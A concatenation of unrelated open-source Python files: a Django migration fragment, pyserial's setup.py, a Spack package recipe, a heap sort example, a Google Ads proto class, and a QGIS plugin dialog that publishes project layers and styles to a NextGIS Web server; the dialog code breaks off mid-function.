'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'nodemanager.citreeinfo': {
'Meta': {'object_name': 'CITreeInfo'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_master': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'nodemanager.conceptatom': {
'Meta': {'object_name': 'ConceptAtom'},
'concept_node': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['nodemanager.ConceptNode']"}),
'final_choice': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'merged_atoms': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['nodemanager.ConceptAtom']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '140'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['authtools.User']"})
},
u'nodemanager.conceptnode': {
'Meta': {'object_name': 'ConceptNode'},
'child_typename': ('django.db.models.fields.CharField', [], {'default': "'unnamed'", 'max_length': '50'}),
'ci_tree_info': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['nodemanager.CITreeInfo']"}),
'content': ('django.db.models.fields.TextField', [], {'max_length': '140'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
u'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
u'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'max_children': ('django.db.models.fields.IntegerField', [], {'default': '5'}),
'node_type': ('django.db.models.fields.CharField', [], {'default': "'F'", 'max_length': '1'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'related_name': "'children'", 'null': 'True', 'to': u"orm['nodemanager.ConceptNode']"}),
u'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
u'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'user': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['authtools.User']", 'symmetrical': 'False'})
}
}
complete_apps = ['nodemanager'] | kevincwebb/conceptum | conceptum/nodemanager/migrations/0006_auto__add_field_conceptnode_max_children__add_field_conceptnode_child_.py | Python | bsd-3-clause | 8,168 |
# setup.py for pySerial
#
# Windows installer:
# "python setup.py bdist_wininst"
#
# Direct install (all systems):
# "python setup.py install"
#
# For Python 3.x use the corresponding Python executable,
# e.g. "python3 setup.py ..."
#
# (C) 2001-2015 Chris Liechti <[email protected]>
#
# SPDX-License-Identifier: BSD-3-Clause
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
# importing version does not work with Python 3 as files have not yet been
# converted.
import serial
version = serial.VERSION
setup(
name = "pyserial",
description = "Python Serial Port Extension",
version = version,
author = "Chris Liechti",
author_email = "[email protected]",
url = "https://github.com/pyserial/pyserial",
packages = ['serial', 'serial.tools', 'serial.urlhandler'],
license = "Python",
long_description = "Python Serial Port Extension for Win32, Linux, BSD, Jython, IronPython",
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: End Users/Desktop',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Operating System :: POSIX',
'Operating System :: Microsoft :: Windows',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Communications',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Terminals :: Serial',
],
platforms = 'any',
scripts = ['serial/tools/miniterm.py'],
)
| hoihu/pyserial | setup.py | Python | bsd-3-clause | 1,969 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyFlake8Polyfill(PythonPackage):
"""flake8-polyfill is a package that provides some compatibility helpers
for Flake8 plugins that intend to support Flake8 2.x and 3.x
simultaneously.
"""
homepage = "https://gitlab.com/pycqa/flake8-polyfill"
pypi = "flake8-polyfill/flake8-polyfill-1.0.2.tar.gz"
version('1.0.2', sha256='e44b087597f6da52ec6393a709e7108b2905317d0c0b744cdca6208e670d8eda')
depends_on('py-setuptools', type='build')
depends_on('py-flake8', type=('build', 'run'))
| LLNL/spack | var/spack/repos/builtin/packages/py-flake8-polyfill/package.py | Python | lgpl-2.1 | 746 |
# Python program for implementation of heap Sort
# To heapify subtree rooted at index i.
# n is size of heap
def heapify(arr, n, i):
largest = i # Initialize largest as root
l = 2 * i + 1 # left = 2*i + 1
r = 2 * i + 2 # right = 2*i + 2
# See if left child of root exists and is
# greater than root
if l < n and arr[i] < arr[l]:
largest = l
# See if right child of root exists and is
# greater than root
if r < n and arr[largest] < arr[r]:
largest = r
# Change root, if needed
if largest != i:
arr[i],arr[largest] = arr[largest],arr[i] # swap
# Heapify the root.
heapify(arr, n, largest)
# The main function to sort an array of given size
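# Heap sort runs in O(n log n) time and sorts the array in place.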
def heapSort(arr):
n = len(arr)
    # Build a maxheap, heapifying from the last non-leaf node down to the root.
    for i in range(n // 2 - 1, -1, -1):
heapify(arr, n, i)
# One by one extract elements
for i in range(n-1, 0, -1):
arr[i], arr[0] = arr[0], arr[i] # swap
heapify(arr, i, 0)
# Driver code to test above
arr = [ 12, 11, 13, 5, 6, 7]
heapSort(arr)
n = len(arr)
print ("Sorted array is")
for i in range(n):
    print("%d" % arr[i]),
| salman-bhai/DS-Algo-Handbook | Algorithms/Sort_Algorithms/Heap_Sort/HeapSort.py | Python | mit | 1,165 |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v10.resources",
marshal="google.ads.googleads.v10",
manifest={"KeywordThemeConstant",},
)
class KeywordThemeConstant(proto.Message):
r"""A Smart Campaign keyword theme constant.
Attributes:
resource_name (str):
Output only. The resource name of the keyword theme
constant. Keyword theme constant resource names have the
form:
``keywordThemeConstants/{keyword_theme_id}~{sub_keyword_theme_id}``
country_code (str):
            Output only. The ISO-3166 Alpha-2 country
            code of the constant, e.g. "US". For display and
            query matching purposes, the keyword theme needs
            to be localized.
This field is a member of `oneof`_ ``_country_code``.
language_code (str):
            Output only. The two-letter ISO-639-1 language
            code of the constant, e.g. "en". For display and
            query matching purposes, the keyword theme needs
            to be localized.
This field is a member of `oneof`_ ``_language_code``.
display_name (str):
Output only. The display name of the keyword
theme or sub keyword theme.
This field is a member of `oneof`_ ``_display_name``.
"""
resource_name = proto.Field(proto.STRING, number=1,)
country_code = proto.Field(proto.STRING, number=2, optional=True,)
language_code = proto.Field(proto.STRING, number=3, optional=True,)
display_name = proto.Field(proto.STRING, number=4, optional=True,)
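    # Hypothetical usage sketch (illustrative values, not real constants):
    # proto-plus messages accept their fields as keyword arguments, e.g.
    #   KeywordThemeConstant(
    #       resource_name="keywordThemeConstants/1~2",
    #       country_code="US", language_code="en", display_name="plumbing")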
__all__ = tuple(sorted(__protobuf__.manifest))
| googleads/google-ads-python | google/ads/googleads/v10/resources/types/keyword_theme_constant.py | Python | apache-2.0 | 2,290 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
publishdialog.py
---------------------
Date : September 2014
Copyright : (C) 2014 by NextGIS
Email : info at nextgis dot org
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'NextGIS'
__date__ = 'September 2014'
__copyright__ = '(C) 2014, NextGIS'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import time
import sys
import re
import json
import datetime
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtXml import *
from qgis.core import *
from qgis.gui import *
import requests
import os
import glob
import uuid
import tempfile
import zipfile
from newngwconnectiondialog import NewNGWConnectionDialog
from ui_publishdialogbase import Ui_Dialog
class PublishDialog(QDialog, Ui_Dialog):
def __init__(self, iface):
QDialog.__init__(self)
self.setupUi(self)
self.iface = iface
self.btnOk = self.buttonBox.button(QDialogButtonBox.Ok)
self.btnClose = self.buttonBox.button(QDialogButtonBox.Close)
self.btnNew.clicked.connect(self.newConnection)
self.btnEdit.clicked.connect(self.editConnection)
self.btnDelete.clicked.connect(self.deleteConnection)
self.btnBrowse.clicked.connect(self.selectProject)
self.populateConnectionList()
def newConnection(self):
dlg = NewNGWConnectionDialog(self)
if dlg.exec_():
self.populateConnectionList()
del dlg
def editConnection(self):
dlg = NewNGWConnectionDialog(self, self.cmbConnections.currentText())
if dlg.exec_():
self.populateConnectionList()
del dlg
def deleteConnection(self):
key = '/connections/' + self.cmbConnections.currentText()
settings = QSettings('NextGIS', 'publish2ngw')
settings.remove(key)
self.populateConnectionList()
def populateConnectionList(self):
self.cmbConnections.clear()
settings = QSettings('NextGIS', 'publish2ngw')
settings.beginGroup('/connections')
self.cmbConnections.addItems(settings.childGroups())
settings.endGroup()
lastConnection = settings.value('/ui/lastConnection', '')
idx = self.cmbConnections.findText(lastConnection)
if idx == -1 and self.cmbConnections.count() > 0:
self.cmbConnections.setCurrentIndex(0)
else:
self.cmbConnections.setCurrentIndex(idx)
if self.cmbConnections.count() == 0:
self.btnEdit.setEnabled(False)
self.btnDelete.setEnabled(False)
else:
self.btnEdit.setEnabled(True)
self.btnDelete.setEnabled(True)
def selectProject(self):
settings = QSettings('NextGIS', 'publish2ngw')
lastDirectory = settings.value('lastDirectory', '.')
fileName = QFileDialog.getOpenFileName(self, self.tr('Select project'), lastDirectory, self.tr('QGIS files (*.qgs *.QGS)'))
if fileName == '':
return
self.leProject.setText(fileName)
settings.setValue('lastDirectory', QFileInfo(fileName).absoluteDir().absolutePath())
def reject(self):
settings = QSettings('NextGIS', 'publish2ngw')
settings.setValue('/ui/lastConnection', self.cmbConnections.currentText())
QDialog.reject(self)
def accept(self):
projectFile = QFile(self.leProject.text())
if not projectFile.open(QIODevice.ReadOnly | QIODevice.Text):
return
doc = QDomDocument()
success, error, lineNum, columnNum = doc.setContent(projectFile, True)
if not success:
return
projectFile.close()
settings = QSettings('NextGIS', 'publish2ngw')
key = '/connections/' + self.cmbConnections.currentText()
self.url = settings.value(key + '/url', '')
self.user = settings.value(key + '/user', '')
self.password = settings.value(key + '/password', '')
self.btnOk.setEnabled(False)
self.btnClose.setEnabled(False)
QApplication.processEvents()
layers = dict()
if doc is not None:
layerNodes = doc.elementsByTagName('maplayer')
for i in xrange(layerNodes.size()):
element = layerNodes.at(i).toElement()
layers[element.firstChildElement('id').text()] = element
self.progressBar.setRange(0, len(layers))
self.progressBar.setValue(0)
self.progressBar.setFormat('%v/%m')
projectTitle = ''
root = doc.documentElement()
e = root.firstChildElement('title')
projectTitle = e.text()
if projectTitle == '':
projectTitle = QFileInfo(self.leProject.text()).baseName()
QgsMessageLog.logMessage('Creating group', 'Publish2NGW', QgsMessageLog.INFO)
QApplication.processEvents()
finished = False
while not finished:
try:
url = self.url + '/resource/0/child/'
params = dict(resource=dict(cls='resource_group', display_name=projectTitle))
group = requests.post(url, auth=(self.user, self.password), data=json.dumps(params))
finished = True
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout), e:
ret = QMessageBox.question(self, self.tr('Retry'), self.tr('Unable to publish. Retry in 30 sec?'), QMessageBox.Retry | QMessageBox.Cancel, QMessageBox.Cancel)
if ret == QMessageBox.Retry:
time.sleep(30)
continue
else:
QgsMessageLog.logMessage('Canceled by user', 'Publish2NGW', QgsMessageLog.INFO)
self.canceled()
return
except requests.exceptions.RequestException, e:
group = None
QgsMessageLog.logMessage('Unable to create resource group %s: %s' % (projectTitle, e.message), 'Publish2NGW', QgsMessageLog.INFO)
self.canceled()
return
if group:
groupId = group.json()['id']
projectTree = self.layerTree(doc)
for layerId, layerElement in layers.iteritems():
layer = None
dataSource = layerElement.firstChildElement('datasource')
uri = dataSource.text()
if uri.startswith('dbname'):
dsUri = QgsDataSourceURI(uri)
if dsUri.host() == '':
dbPath = dsUri.database()
absolutePath = self.fullLayerPath(dbPath, self.leProject.text())
if dbPath != absolutePath:
dsUri.setDatabase(absolutePath)
node = doc.createTextNode(dsUri.uri())
dataSource.replaceChild(node, dataSource.firstChild())
else:
absolutePath = self.fullLayerPath(uri, self.leProject.text())
if absolutePath != uri:
node = doc.createTextNode(absolutePath)
dataSource.replaceChild(node, dataSource.firstChild())
layerType = layerElement.attribute('type')
if layerType == 'vector':
layer = QgsVectorLayer()
elif layerType == 'raster':
layer = QgsRasterLayer()
if layer:
layer.readLayerXML(layerElement)
layer.setLayerName(layerElement.firstChildElement('layername').text())
if layer is None:
continue
self.progressBar.setValue(self.progressBar.value() + 1)
QgsMessageLog.logMessage('Publishing %s' % layer.name(), 'Publish2NGW', QgsMessageLog.INFO)
QApplication.processEvents()
if not absolutePath.startswith('dbname'):
if not os.path.exists(absolutePath):
time.sleep(10)
QgsMessageLog.logMessage('Layer not found', 'Publish2NGW', QgsMessageLog.INFO)
continue
finished = False
while not finished:
try:
resLayer = self.addLayer(groupId, layer.name(), layer)
finished = True
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout), e:
ret = QMessageBox.question(self, self.tr('Retry'), self.tr('Unable to publish. Retry in 30 sec?'), QMessageBox.Retry | QMessageBox.Cancel, QMessageBox.Cancel)
if ret == QMessageBox.Retry:
time.sleep(30)
continue
else:
QgsMessageLog.logMessage('Canceled by user', 'Publish2NGW', QgsMessageLog.INFO)
ret = QMessageBox.question(self, self.tr('Cleanup'), self.tr('Publishing error. Drop resource group?'), QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if ret == QMessageBox.Yes:
url = self.url + '/resource/0/child/' + groupId
requests.delete(url, auth=(self.user, self.password))
self.canceled()
return
if resLayer is None:
QgsMessageLog.logMessage('Layer upload failed. Exiting', 'Publish2NGW', QgsMessageLog.INFO)
ret = QMessageBox.question(self, self.tr('Cleanup'), self.tr('Publishing error. Drop resource group?'), QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if ret == QMessageBox.Yes:
url = self.url + '/resource/0/child/' + str(groupId)
requests.delete(url, auth=(self.user, self.password))
self.canceled()
return
if resLayer.status_code / 100 != 2:
msg = json.dumps(resLayer.json()['message'], ensure_ascii=False).strip('"')
QgsMessageLog.logMessage('NGW error: %s' % msg, 'Publish2NGW', QgsMessageLog.INFO)
ret = QMessageBox.question(self, self.tr('Cleanup'), self.tr('Publishing error. Drop resource group?'), QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if ret == QMessageBox.Yes:
url = self.url + '/resource/0/child/' + str(groupId)
requests.delete(url, auth=(self.user, self.password))
self.canceled()
return
QgsMessageLog.logMessage('Publishing style for %s' % layer.name(), 'Publish2NGW', QgsMessageLog.INFO)
QApplication.processEvents()
finished = False
while not finished:
try:
resStyle = self.addStyle(resLayer, layer).json()
finished = True
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout), e:
ret = QMessageBox.question(self, self.tr('Retry'), self.tr('Unable to publish. Retry in 30 sec?'), QMessageBox.Retry | QMessageBox.Cancel, QMessageBox.Cancel)
if ret == QMessageBox.Retry:
time.sleep(30)
continue
else:
QgsMessageLog.logMessage('Canceled by user', 'Publish2NGW', QgsMessageLog.INFO)
ret = QMessageBox.question(self, self.tr('Cleanup'), self.tr('Publishing error. Drop resource group?'), QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if ret == QMessageBox.Yes:
url = self.url + '/resource/0/child/' + groupId
requests.delete(url, auth=(self.user, self.password))
self.canceled()
return
if not isinstance(resStyle, dict) and resStyle.status_code / 100 != 2:
msg = json.dumps(resStyle.json()['message'], ensure_ascii=False).strip('"')
QgsMessageLog.logMessage('NGW error: %s' % msg, 'Publish2NGW', QgsMessageLog.INFO)
ret = QMessageBox.question(self, self.tr('Cleanup'), self.tr('Publishing error. Drop resource group?'), QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if ret == QMessageBox.Yes:
url = self.url + '/resource/0/child/' + str(groupId)
requests.delete(url, auth=(self.user, self.password))
self.canceled()
return
self.updateLayerData(projectTree, layerId, resStyle['id'])
mapTitle = projectTitle + '-map'
authIdElem = doc.documentElement().firstChildElement('mapcanvas').firstChildElement('destinationsrs').firstChildElement('spatialrefsys').firstChildElement('authid')
if not authIdElem.isNull():
crs = QgsCRSCache.instance().crsByAuthId(authIdElem.text())
else:
crs = QgsCRSCache.instance().crsByEpsgId(4326)
extent = QgsRectangle()
root = doc.documentElement()
canvas = root.firstChildElement('mapcanvas')
e = canvas.firstChildElement('extent')
xMin = float(e.firstChildElement('xmin').text())
xMax = float(e.firstChildElement('xmax').text())
yMin = float(e.firstChildElement('ymin').text())
yMax = float(e.firstChildElement('ymax').text())
extent.set(xMin, yMin, xMax, yMax)
crsTransform = QgsCoordinateTransform(crs, QgsCoordinateReferenceSystem(4326))
outExtent = crsTransform.transformBoundingBox(extent)
QgsMessageLog.logMessage('Creating map', 'Publish2NGW', QgsMessageLog.INFO)
QApplication.processEvents()
finished = False
while not finished:
try:
mapTree = self.paramsFromLayerTree(projectTree)
if mapTree is None:
QgsMessageLog.logMessage('Unable to create web-map: there are no styles.', 'Publish2NGW', QgsMessageLog.INFO)
self.canceled()
return
url = self.url + '/resource/' + str(groupId) + '/child/'
params = dict(resource=dict(cls='webmap', display_name=mapTitle, parent=dict(id=groupId)), webmap=dict(extent_left=outExtent.xMinimum(), extent_right=outExtent.xMaximum(), extent_top=outExtent.yMaximum(), extent_bottom=outExtent.yMinimum(), root_item=dict(item_type='root', children=mapTree)))
m = requests.post(url, auth=(self.user, self.password), data=json.dumps(params))
finished = True
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout), e:
ret = QMessageBox.question(self, self.tr('Retry'), self.tr('Unable to publish. Retry in 30 sec?'), QMessageBox.Retry | QMessageBox.Cancel, QMessageBox.Cancel)
if ret == QMessageBox.Retry:
time.sleep(30)
continue
else:
QgsMessageLog.logMessage('Canceled by user', 'Publish2NGW', QgsMessageLog.INFO)
ret = QMessageBox.question(self, self.tr('Cleanup'), self.tr('Publishing error. Drop resource group?'), QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if ret == QMessageBox.Yes:
url = self.url + '/resource/0/child/' + groupId
requests.delete(url, auth=(self.user, self.password))
self.canceled()
return
except requests.exceptions.RequestException, e:
QgsMessageLog.logMessage(e.message, 'Publish2NGW', QgsMessageLog.INFO)
ret = QMessageBox.question(self, self.tr('Cleanup'), self.tr('Publishing error. Drop resource group?'), QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if ret == QMessageBox.Yes:
url = self.url + '/resource/0/child/' + groupId
requests.delete(url, auth=(self.user, self.password))
self.canceled()
return
self.published(m)
def published(self, wmap):
ret = QMessageBox.question(self, self.tr('Finished'), self.tr('Publishing completed.\n\nOpen map?'), QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if ret == QMessageBox.Yes:
QDesktopServices.openUrl(QUrl(self.url + '/resource/' + str(wmap.json()['id']) + '/display'))
self.btnOk.setEnabled(True)
self.btnClose.setEnabled(True)
self.progressBar.setRange(0, 1)
self.progressBar.setValue(0)
self.progressBar.setFormat('')
def canceled(self):
QMessageBox.warning(self, self.tr('Finished'), self.tr('Publishing failed. See log for more details'))
self.btnOk.setEnabled(True)
self.btnClose.setEnabled(True)
self.progressBar.setRange(0, 1)
self.progressBar.setValue(0)
self.progressBar.setFormat('')
def addLayer(self, parent, name, layer):
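        # Publish the layer to NextGIS Web depending on its provider:
        # ogr vectors are exported to a zipped shapefile and uploaded as a
        # vector_layer; postgres vectors get a postgis_connection plus a
        # postgis_layer; gdal rasters are uploaded as a raster_layer; wms
        # layers get a wmsclient_connection plus a wmsclient_layer.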
layerName = layer.name()
layerType = layer.type()
provider = layer.providerType()
auth = (self.user, self.password)
try:
if layerType == QgsMapLayer.VectorLayer:
if provider == 'ogr':
source = self.exportToShapeFile(layer)
filePath = self.compressShapeFile(source)
with open(filePath, 'rb') as f:
fl = requests.put(self.url + '/file_upload/upload', auth=auth, data=f)
url = self.url + '/resource/' + str(parent) + '/child/'
params = dict(resource=dict(cls='vector_layer', display_name=name), vector_layer=dict(srs=dict(id=3857), source=fl.json()))
res = requests.post(url, auth=auth, data=json.dumps(params))
return res
elif provider == 'postgres':
metadata = layer.source().split(' ')
regex = re.compile('^host=.*')
pos = metadata.index([m.group(0) for l in metadata for m in [regex.search(l)] if m][0])
tmp = metadata[pos]
pos = tmp.find('=')
host = tmp[pos + 1:]
regex = re.compile('^dbname=.*')
pos = metadata.index([m.group(0) for l in metadata for m in [regex.search(l)] if m][0])
tmp = metadata[pos]
pos = tmp.find('=')
dbname = tmp[pos + 2:-1]
regex = re.compile('^user=.*')
pos = metadata.index([m.group(0) for l in metadata for m in [regex.search(l)] if m][0])
tmp = metadata[pos]
pos = tmp.find('=')
userName = tmp[pos + 2:-1]
regex = re.compile('^password=.*')
pos = metadata.index([m.group(0) for l in metadata for m in [regex.search(l)] if m][0])
tmp = metadata[pos]
pos = tmp.find('=')
password = tmp[pos + 2:-1]
regex = re.compile('^key=.*')
pos = metadata.index([m.group(0) for l in metadata for m in [regex.search(l)] if m][0])
tmp = metadata[pos]
pos = tmp.find('=')
key = tmp[pos + 2:-1]
regex = re.compile('^table=.*')
pos = metadata.index([m.group(0) for l in metadata for m in [regex.search(l)] if m][0])
tmp = metadata[pos]
pos = tmp.find('=')
tmp = tmp[pos + 2:-1].split('.')
schema = tmp[0][:-1]
table = tmp[1][1:]
regex = re.compile('^\(.*\)')
pos = metadata.index([m.group(0) for l in metadata for m in [regex.search(l)] if m][0])
column = metadata[pos][1:-1]
url = self.url + '/resource/' +str(parent) +'/child/'
connName = host + '-' + dbname + '-' + datetime.datetime.now().isoformat()
params = dict(resource=dict(cls='postgis_connection', display_name=connName), postgis_connection=dict(hostname=host, database=dbname, username=userName, password=password))
c = requests.post(url, auth=auth, data=json.dumps(params))
params = dict(resource=dict(cls='postgis_layer', display_name=name), postgis_layer=dict(srs=dict(id=3857), fields='update', connection=c.json(), table=table, schema=schema, column_id=key, column_geom=column))
res = requests.post(url, auth=auth, data=json.dumps(params))
return res
else:
QgsMessageLog.logMessage('Unable to publish layer %s: unsupported data provider: %s.' % (layerName, provider), 'PublishToNGW', QgsMessageLog.INFO)
return None
elif layerType == QgsMapLayer.RasterLayer:
if provider == 'gdal':
filePath = layer.source()
with open(filePath, 'rb') as f:
fl = requests.put(self.url + '/file_upload/upload', auth=auth, data=f)
url = self.url + '/resource/' + str(parent) + '/child/'
params = dict(resource=dict(cls='raster_layer', display_name=name), raster_layer=dict(srs=dict(id=3857), source=fl.json()))
res = requests.post(url, auth=auth, data=json.dumps(params))
return res
elif provider == 'wms':
metadata = layer.source()
regex = re.compile('format=.*?&')
m = regex.search(metadata)
tmp = metadata[m.start():m.end() - 1]
pos = tmp.find('=')
imgFormat = tmp[pos + 1:]
regex = re.compile('layers=.*?&')
m = regex.findall(metadata)
tmp = []
for i in m:
pos = i.find('=')
tmp.append(i[pos+1:-1])
layers = ','.join(tmp)
regex = re.compile('url=.*')
m = regex.search(metadata)
tmp = metadata[m.start():m.end()]
pos = tmp.find('=')
uri = tmp[pos + 1:]
regex = re.compile('//.*/')
m = regex.search(uri)
host = uri[m.start():m.end()][2:-1]
url = self.url + '/resource/' + str(parent) + '/child/'
connName = host + '-' + datetime.datetime.now().isoformat()
params = dict(resource=dict(cls='wmsclient_connection', display_name=connName), wmsclient_connection=dict(url=uri, version='1.1.1', capcache='query'))
c = requests.post(url, auth=auth, data=json.dumps(params))
params = dict(resource=dict(cls='wmsclient_layer', display_name=name), wmsclient_layer=dict(srs=dict(id=3857), wmslayers=layers, imgformat=imgFormat, connection=c.json()))
res = requests.post(url, auth=auth, data=json.dumps(params))
return res
else:
QgsMessageLog.logMessage('Unable to publish layer %s: unsupported data provider: %s.' % (layerName, provider), 'Publish2NGW', QgsMessageLog.INFO)
return None
else:
QgsMessageLog.logMessage('Unable to publish layer %s: unsupported layer type %s' % (layerName, layerType), 'Publish2NGW', QgsMessageLog.INFO)
return None
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout), e:
if hasattr(e, 'message'):
QgsMessageLog.logMessage(str(e.message), 'Publish2NGW', QgsMessageLog.INFO)
else:
QgsMessageLog.logMessage(unicode(e), 'Publish2NGW', QgsMessageLog.INFO)
raise
except requests.exceptions.RequestException, e:
QgsMessageLog.logMessage('Unable to publish layer %s: %s' % (layerName, e.message), 'Publish2NGW', QgsMessageLog.INFO)
return None
def addStyle(self, resource, layer):
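        # Create a style child resource for the published layer: vector styles
        # are converted from the QGIS QML via the NGW qml-transform endpoint
        # into a mapserver_style, gdal rasters get a raster_style, and wms
        # layers are returned unchanged because they carry no style.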
layerId = resource.json()['id']
layerName = layer.name()
layerType = layer.type()
provider = layer.providerType()
auth = (self.user, self.password)
styleName = layerName + '-style'
try:
if layerType == QgsMapLayer.VectorLayer:
tmp = self.tempFileName('.qml')
msg, saved = layer.saveNamedStyle(tmp)
with open(tmp, 'rb') as f:
styleFile = requests.put(self.url + '/file_upload/upload', auth=auth, data=f)
url = self.url + '/mapserver/qml-transform'
params = dict(file=dict(upload_meta=[styleFile.json()]))
hdrAccept = {'Accept': 'application/json'}
ngwStyle = requests.post(url, auth=auth, headers=hdrAccept, data=json.dumps(params))
url = self.url + '/resource/' + str(layerId) +'/child/'
params = dict(resource=dict(cls='mapserver_style', display_name=styleName, parent=dict(id=layerId)), mapserver_style=dict(xml=ngwStyle.json()))
res = requests.post(url, auth=auth, data=json.dumps(params))
return res
elif layerType == QgsMapLayer.RasterLayer:
if provider == 'gdal':
url = self.url + '/resource/' + str(layerId) +'/child/'
params = dict(resource=dict(cls='raster_style', display_name=styleName, parent=dict(id=layerId)))
res = requests.post(url, auth=auth, data=json.dumps(params))
return res
elif provider == 'wms':
return resource
else:
QgsMessageLog.logMessage('Unable to publish style for layer %s: unsupported data provider: %s.' % (layerName, provider), 'Publish2NGW', QgsMessageLog.INFO)
return None
else:
QgsMessageLog.logMessage('Unable to publish style for layer %s: unsupported layer type %s' % (layerName, layerType), 'Publish2NGW', QgsMessageLog.INFO)
return None
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout), e:
if hasattr(e, 'message'):
QgsMessageLog.logMessage(unicode(e.message), 'Publish2NGW', QgsMessageLog.INFO)
else:
QgsMessageLog.logMessage(unicode(e), 'PublishToNGW', QgsMessageLog.INFO)
raise
except requests.exceptions.RequestException, e:
QgsMessageLog.logMessage('Unable to publish layer %s: %s' % (layerName, e.message), 'Publish2NGW', QgsMessageLog.INFO)
return None
def updateLayerData(self, data, layerId, styleId):
for item in data:
if item['itemType'] == 'layer' and item['id'] == layerId:
item['styleId'] = styleId
elif item['itemType'] == 'group':
item['layers'] = self.updateLayerData(item['layers'], layerId, styleId)
return data
def layerTree(self, doc):
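        # Walk the project's <legend> element and build a nested list of
        # layer/group dicts (id, name, enabled state) that is later used to
        # assemble the web map.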
tree = []
legend = doc.documentElement().firstChildElement('legend')
child = legend.firstChildElement()
while not child.isNull():
e = child.toElement()
itemType = e.tagName()
if itemType == 'legendlayer':
layer = dict()
layer['itemType'] = 'layer'
fileNodes = e.elementsByTagName('legendlayerfile')
lid = fileNodes.at(0).toElement().attribute('layerid')
layer['id'] = lid
layer['name'] = e.attribute('name')
layer['enabled'] = 'true' if e.attribute('checked') == 'Qt::Checked' else 'false'
tree.append(layer)
elif itemType == 'legendgroup':
group = dict()
group['itemType'] = 'group'
group['name'] = e.attribute('name')
group['open'] = e.attribute('open')
group['layers'] = []
legendLayer = e.firstChildElement()
while not legendLayer.isNull():
layer = dict()
layer['itemType'] = 'layer'
fileNodes = legendLayer.elementsByTagName('legendlayerfile')
lid = fileNodes.at(0).toElement().attribute('layerid')
layer['id'] = lid
layer['name'] = legendLayer.attribute('name')
layer['enabled'] = 'true' if legendLayer.attribute('checked') == 'Qt::Checked' else 'false'
group['layers'].append(layer)
legendLayer = legendLayer.nextSiblingElement()
tree.append(group)
child = child.nextSiblingElement()
return tree
def fullLayerPath(self, source, filePath):
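        # Resolve a layer path given relative to the project file ('./' or
        # '../' prefixed) into an absolute path, normalising Windows
        # separators and UNC paths along the way.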
if not source.startswith(('./', '../')):
return source
src = source
prj = filePath
if sys.platform == 'win32':
src = src.replace('\\', '/')
prj = prj.replace('\\', '/')
uncPath = prj.startswith('//')
layerParts = [s for s in src.split('/') if s]
projectParts = [s for s in prj.split('/') if s]
if sys.platform == 'win32' and uncPath:
projectParts.insert(0, '')
